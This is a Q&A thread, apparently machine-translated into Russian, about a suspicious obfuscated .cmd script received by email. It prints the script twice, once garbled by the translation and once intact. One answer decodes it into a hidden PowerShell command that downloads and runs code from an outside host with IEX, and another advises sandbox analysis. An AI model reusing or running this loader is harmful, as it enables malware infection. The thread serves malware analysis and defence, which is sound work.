Странный cmd зашифрованный скрипт, отправленный по электронной почте

Question

Сегодня я получил что-то очень интересное. Это скрипт .cmd с зашифрованными командами. Может кто-нибудь сказать мне, что это за шифрование? Это можно расшифровать? Или как Windows читает этот тип команды?
Я выполнил этот код на моей Win7 VM, но ничего не произошло. Я искал что-то странное, например, службы, процессы или переменную env ... Все выглядит нормально

! @ эхо выключено
cd% SystemRoot%\System32
set uQmFERgK = GFYpgWoTABQSI5bRJVKaHwNjcO1tPlf8k4zMv3dsUeXqEZxDCi62L09u7nrmyh
установить JD = W ^ i ^ n
установить beoxNuYr = ^ d ^ o ^ w
установить fSUXCI = ^ sPo
установить XFY = ^ мы ^ г
set NKHoDvv = She
установить DdAvVw = ^ l ^ l\
установите BnCCBy = v ^ 1 ^.
установить xuuyxYlz = ^ 0 ^\p ^ o
установить zEonzEj = ^ w ^ e
установить nqfsDHhb = r ^ sh
установить tsaNePh = el ^ l
установить qIrKO = ^. e ^ x
установить qlLkftpA = ^ e - ^ n
установить pZckbH = op ^
установить MrCpkeh = -w
установить кГм = ^ i ^ n ^ 1 ^ -
установить дату =% uQmFERgK:~ 49,1 %% uQmFERgK:~ 44,1 %% uQmFERgK:~ 42,1%
(^ "% UQmFERgK:~ 12,1 %% uQmFERgK:~ 44,1 %% uQmFERgK:~ 42,1%
(% UQmFERgK:~ 22,1 %% uQmFERgK:~ 44,1 %% uQmFERgK:~ 5,1 %% uQmFERgK:~ 25,1 %% uQmFERgK:~ 9,1 %% uQmFERgK:~ 16,1% % uQmFERgK:~ 41,1 %% uQmFERgK:~ 24,1 %% uQmFERgK:~ 7,1%% uQmFERgK:~ 22,1 %% uQmFERgK:~ 41,1 %% uQmFERgK:~ 27,1%.% uQmFERgK:~ 21,1 %% uQmFERgK:~ 41,1 %% uQmFERgK:~ 9,1 %% uQmFERgK:~ 48,1 %% uQmFERgK:~ 52,1 %% uQmFERgK:~ 12,1 %% uQmFERgK:~ 44,1 %% uQmFERgK:~ 57,1 %% uQmFERgK:~ 27,1%)% uQmFERgK:. ~ 38,1 %% uQmFERgK:~ 25,1 %% uQmFERgK:~ 21,1 %% uQmFERgK:~ 22,1 %% uQmFERgK:~ 52,1 %% uQmFERgK:~ 6,1 %% uQmFERgK:~ 8,1 %% uQmFERgK:~ 38,1 %% uQmFERgK:~ 11,1 %% uQmFERgK:~ 7 , 1 %% uQmFERgK:~ 15,1 %% uQmFERgK:~ 49,1 %% uQmFERgK:~ 57,1 %% uQmFERgK:~ 4,1%('% uQmFERgK:~ 61,1 %% uQmFERgK:~ 27 , 1 %% uQmFERgK:~ 27,1 %% uQmFERgK:~ 3,1 %% uQmFERgK:~ 39,1%://% uQmFERgK:~ 38,1 %% uQmFERgK:~ 29,1 %% uQmFERgK:~ 59,1%% uQmFERgK:. ~ 3,1 %% uQmFERgK:~ 19,1 %% uQmFERgK:~ 57,1 %% uQmFERgK:~ 57,1 %% uQmFERgK:~ 6,1 %% uQmFERgK:~ 38 , 1%% uQmFERgK:. ~ 24,1 %% uQmFERgK:~ 6,1 %% uQmFERgK:~ 59,1%/?% UQmFERgK:~ 38,1 %% uQmFERgK:~ 5,1 %% uQmFERgK:~ 9,1 %% uQmFERgK:~ 32,1 %% uQmFERgK:~ 55,1 %% uQmFERgK:~ 4,1 %% uQmFERgK:~ 25,1 %% uQmFERgK:~ 8,1 %% uQmFERgK:~ 2,1 %% uQmFERgK:~ 50,1 %% uQmFERgK:~ 35,1 %% uQmFERgK:~ 52,1%/% uQmFERgK:~ 16,1 %% uQmFERgK:~ 27,1 %% uQmFERgK:~ 9,1 %% uQmFERgK:~ 41,1 %% uQmFERgK:~ 31,1 %% uQmFERgK:~ 3,1 %% uQmFERgK:~ 18 , 1 %% uQmFERgK:~ 7,1 %% uQmFERgK:~ 35,1 %% uQmFERgK:~ 48,1 %% uQmFERgK:~ 11,1 %% uQmFERgK:~ 4,1 %% uQmFERgK:~ 3,1 %% uQmFERgK:~ 15,1 %% uQmFERgK:~ 41,1 %% uQmFERgK:~ 17,1 %% uQmFERgK:~ 42,1 %% uQmFERgK:~ 61,1 %% uQmFERgK:~ 45,1%+% uQmFERgK:~ 43,1 %% uQmFERgK:~ 48,1 %% uQmFERgK:~ 23,1 %% uQmFERgK:~ 2,1 %% uQmFERgK:~ 42,1 %% uQmFERgK:~ 21,1 %% uQmFERgK:~ 61,1 %% uQmFERgK:~ 41,1 %% uQmFERgK:~ 20,1 %% uQmFERgK:~ 30,1 %% uQmFERgK:~ 39,1 %% uQmFERgK:~ 48,1 %% uQmFERgK:~ %% 12,1 uQmFERgK:~ 52,1 %% uQmFERgK:~ 42,1 %% uQmFERgK:~ 19,1 %% uQmFERgK:~ 37,1 %% uQmFERgK:~ 1,1 %% uQmFERgK:~ 23, 1 %% uQmFERgK:~ 37,1 %% uQmFERgK:~ 21,1 %% uQmFERgK:~ 6,1 %% uQmFERgK:~ 57,1 %% uQmFERgK:~ 38,1 %% uQmFERgK:~ 23,1% % uQmFERgK:~ 31,1 %% uQmFERgK:~ 60,1 %% uQmFERgK:~ 15,1 %% uQmFERgK:~ 25,1 %% uQmFERgK:~ 11,1 %% uQmFERgK:~ 39,1 %% uQmFERgK:~ 25,1 %% ио mFERgK:~ 11,1 %% uQmFERgK:~ 25,1 %% uQmFERgK:~ 43,1 %% uQmFERgK:~ 23,1 %% uQmFERgK:~ 58,1 %% uQmFERgK:~ 23,1 %% uQmFERgK:~ %% uQmFERgK 14,1:~ 25,1 %% uQmFERgK:~ 5,1 %% uQmFERgK:~ 55,1 %% uQmFERgK:~ 58,1 %% uQmFERgK:~ 52,1 %% uQmFERgK:~ 22 , 1 %% uQmFERgK:~ 7,1 %% uQmFERgK:~ 36,1 %% uQmFERgK:~ 12,1% G% uQmFERgK:~ 8,1 %% uQmFERgK:~ 19,1 %% uQmFERgK:~ 8, 1 %% uQmFERgK:~ 6,1 %% uQmFERgK:~ 17,1 %% uQmFERgK:~ 21,1 %% uQmFERgK:~ 37,1 %% uQmFERgK:~ 32,1 %% uQmFERgK:~ 47,1% % uQmFERgK:~ 31,1 %% uQmFERgK:~ 51,1%/% uQmFERgK:~ 5,1 %% uQmFERgK:~ 58,1 %% uQmFERgK:~ 12,1 %% uQmFERgK:~ 28,1 %% uQmFERgK:~ 8,1 %% uQmFERgK:~ 14,1 %% uQmFERgK:~ 37,1 %% uQmFERgK:~ 17,1 %% uQmFERgK:~ 35,1 %% uQmFERgK:~ 26,1 %% uQmFERgK:~ 8,1 %% uQmFERgK:~ 24,1 %% uQmFERgK:~ 30,1 %% uQmFERgK:~ 3,1 %% uQmFERgK:~ 23,1 %% uQmFERgK:~ 29,1 %% uQmFERgK:~ 21 , 1 %% uQmFERgK:~ 3,1% ')^ ");
эхо %% date %% | % JD %% beoxNuYr %% %% fSUXCI XFY %% NKHoDvv %% %% DdAvVw BnCCBy %% xuuyxYlz %% %% zEonzEj nqfsDHhb %% tsaNePh %% %% qIrKO qlLkftpA %% pZckbH %% %% MrCpkeh KGM%

Answer 1

Чтобы деобфусцировать код (возможно, неполный и слегка испорченный), вы можете настроить его перед запуском, чтобы просто отображать любые опасные операции вместо их запуска

• используя команду ECHO и / или
• избегая всех перенаправлений (некоторые ядовитые символы cmd )

как показано в следующем фрагменте кода с комментариями :

@echo off
ECHO cd %SystemRoot%\System32
::   ↑↑ there is nothing to do in the "%SystemRoot%\System32" folder  
set uQmFERgK=GFYpgWoTABQSI5bRJVKaHwNjcO1tPlf8k4zMv3dsUeXqEZxDCi62L09u7nrmyh
set JD=W^i^n
set beoxNuYr=^d^o^w
set fSUXCI=^sPo
set XFY=^we^r
set NKHoDvv=She
set DdAvVw=^l^l\
set BnCCBy=v^1^.
set xuuyxYlz=^0^\p^o
set zEonzEj=^w^e
set nqfsDHhb=r^sh
set tsaNePh=el^l
set qIrKO=^.e^x
set qlLkftpA=^e -^n
set pZckbH=op^ 
set MrCpkeh=-w
set kGm=^i^n ^1^ -
ECHO set date=%uQmFERgK:~49,1%%uQmFERgK:~44,1%%uQmFERgK:~42,1% (^"%uQmFERgK:~12,1%%uQmFERgK:~44,1%%uQmFERgK:~42,1% (%uQmFERgK:~22,1%%uQmFERgK:~44,1%%uQmFERgK:~5,1%-%uQmFERgK:~25,1%%uQmFERgK:~9,1%%uQmFERgK:~16,1%%uQmFERgK:~41,1%%uQmFERgK:~24,1%%uQmFERgK:~7,1% %uQmFERgK:~22,1%%uQmFERgK:~41,1%%uQmFERgK:~27,1%.%uQmFERgK:~21,1%%uQmFERgK:~41,1%%uQmFERgK:~9,1%%uQmFERgK:~48,1%%uQmFERgK:~52,1%%uQmFERgK:~12,1%%uQmFERgK:~44,1%%uQmFERgK:~57,1%%uQmFERgK:~27,1%).%uQmFERgK:~38,1%%uQmFERgK:~25,1%%uQmFERgK:~21,1%%uQmFERgK:~22,1%%uQmFERgK:~52,1%%uQmFERgK:~6,1%%uQmFERgK:~8,1%%uQmFERgK:~38,1%%uQmFERgK:~11,1%%uQmFERgK:~7,1%%uQmFERgK:~15,1%%uQmFERgK:~49,1%%uQmFERgK:~57,1%%uQmFERgK:~4,1%('%uQmFERgK:~61,1%%uQmFERgK:~27,1%%uQmFERgK:~27,1%%uQmFERgK:~3,1%%uQmFERgK:~39,1%://%uQmFERgK:~38,1%%uQmFERgK:~29,1%%uQmFERgK:~59,1%.%uQmFERgK:~3,1%%uQmFERgK:~19,1%%uQmFERgK:~57,1%%uQmFERgK:~57,1%%uQmFERgK:~6,1%%uQmFERgK:~38,1%.%uQmFERgK:~24,1%%uQmFERgK:~6,1%%uQmFERgK:~59,1%/?%uQmFERgK:~38,1%%uQmFERgK:~5,1%%uQmFERgK:~9,1%%uQmFERgK:~32,1%%uQmFERgK:~55,1%%uQmFERgK:~4,1%%uQmFERgK:~25,1%%uQmFERgK:~8,1%%uQmFERgK:~2,1%%uQmFERgK:~50,1%%uQmFERgK:~35,1%%uQmFERgK:~52,1%/%uQmFERgK:~16,1%%uQmFERgK:~27,1%%uQmFERgK:~9,1%%uQmFERgK:~41,1%%uQmFERgK:~31,1%%uQmFERgK:~3,1%%uQmFERgK:~18,1%%uQmFERgK:~7,1%%uQmFERgK:~35,1%%uQmFERgK:~48,1%%uQmFERgK:~11,1%%uQmFERgK:~4,1%%uQmFERgK:~3,1%%uQmFERgK:~15,1%%uQmFERgK:~41,1%%uQmFERgK:~17,1%%uQmFERgK:~42,1%%uQmFERgK:~61,1%%uQmFERgK:~45,1%+%uQmFERgK:~43,1%%uQmFERgK:~48,1%%uQmFERgK:~23,1%%uQmFERgK:~2,1%%uQmFERgK:~42,1%%uQmFERgK:~21,1%%uQmFERgK:~61,1%%uQmFERgK:~41,1%%uQmFERgK:~20,1%%uQmFERgK:~30,1%%uQmFERgK:~39,1%%uQmFERgK:~48,1%%uQmFERgK:~12,1%%uQmFERgK:~52,1%%uQmFERgK:~42,1%%uQmFERgK:~19,1%%uQmFERgK:~37,1%%uQmFERgK:~1,1%%uQmFERgK:~23,1%%uQmFERgK:~37,1%%uQmFERgK:~21,1%%uQmFERgK:~6,1%%uQmFERgK:~57,1%%uQmFERgK:~38,1%%uQmFERgK:~23,1%%uQmFERgK:~31,1%%uQmFERgK:~60,1%%uQmFERgK:~15,1%%uQmFERgK:~25,1%%uQmFERgK:~11,1%%uQmFERgK:~39,1%%uQmFERgK:~25,1%%uQmFERgK:~11,1%%uQmFERgK:~25,1%%uQmFERgK:~43,1%%uQmFERgK:~23,1%%uQmFERgK:~58,1%%uQmFERgK:~23,1%%uQmFERgK:~14,1%%uQmFERgK:~25,1%%uQmFERgK:~5,1%%uQmFERgK:~55,1%%uQmFERgK:~58,1%%uQmFERgK:~52,1%%uQmFERgK:~22,1%%uQmFERgK:~7,1%%uQmFERgK:~36,1%%uQmFERgK:~12,1%G%uQmFERgK:~8,1%%uQmFERgK:~19,1%%uQmFERgK:~8,1%%uQmFERgK:~6,1%%uQmFERgK:~17,1%%uQmFERgK:~21,1%%uQmFERgK:~37,1%%uQmFERgK:~32,1%%uQmFERgK:~47,1%%uQmFERgK:~31,1%%uQmFERgK:~51,1%/%uQmFERgK:~5,1%%uQmFERgK:~58,1%%uQmFERgK:~12,1%%uQmFERgK:~28,1%%uQmFERgK:~8,1%%uQmFERgK:~14,1%%uQmFERgK:~37,1%%uQmFERgK:~17,1%%uQmFERgK:~35,1%%uQmFERgK:~26,1%%uQmFERgK:~8,1%%uQmFERgK:~24,1%%uQmFERgK:~30,1%%uQmFERgK:~3,1%%uQmFERgK:~23,1%%uQmFERgK:~29,1%%uQmFERgK:~21,1%%uQmFERgK:~3,1%')^");
::   ↑↑↑ ↑↑↑↑ volatile environment variable "date" contains current system date
ECHO echo %%date%% ^| %JD%%beoxNuYr%%fSUXCI%%XFY%%NKHoDvv%%DdAvVw%%BnCCBy%%xuuyxYlz%%zEonzEj%%nqfsDHhb%%tsaNePh%%qIrKO%%qlLkftpA%%pZckbH%%MrCpkeh%%kGm%
::                 ↑↑ escape the pipe operator

Код результата:

cd C:\WINDOWS\System32
set date=iEX ("IEX (NEW-OBJecT Net.weBCLIEnt).dOwNLoAdSTRing('https://dlm.pannod.com/?dWBkugOAY6ML/JtBe8pKTMCSgpReVXhZ+qCjYXwheHfsCILXa3Fj3wondj8yROSsOSOqjrjbOWurLNTvIGAaAoVw3kD82/WrIPAb3VM1Acfpjlwp')");
echo %date% | WindowsPowerShell\v1.0\powershell.exe -nop -win 1 -

показывает, что это попытка

• загрузить код с https://dlm.pannod.com/ и
• запустите этот код в Windows Powershell с помощью командлета Invoke-Expression (см. псевдоним IEX ):

Дополнительные ресурсы (требуется чтение, не полностью):

• (справочник по командам) Индекс AZ командной строки Windows CMD
• (дополнительные особенности) Синтаксис командной строки Windows CMD Shell
• (%uQmFERgK:~49,1% и т. д.) Извлечь часть переменной (подстроку)
• Переменная Редактировать / Заменить

Answer 2

Будем надеяться и предполагать, что эта Win7 VM является песочницей. Поскольку этот сценарий запутан, исследование его в восстанавливаемой песочнице будет в порядке. В противном случае это было бы просто глупо.

Просто посмотрев на это, он сначала добавляется в папку system32\ , запускает PowerShell и что-то в ней делает. Теперь верните песочницу в исходное состояние и сначала запустите Process Monitor . Таким образом, вы можете фиксировать, какие изменения будут внесены в систему.

Сконцентрируйтесь сначала на записи файлов и реестра, а затем на возможных сетевых подключениях, загружающих больше вредоносных программ. Изменение также может быть небольшим, возможно, достаточным для предоставления доступа для последующих атак. Если вы тщательно проведете это исследование, пожалуйста, поделитесь его результатами в качестве самостоятельного ответа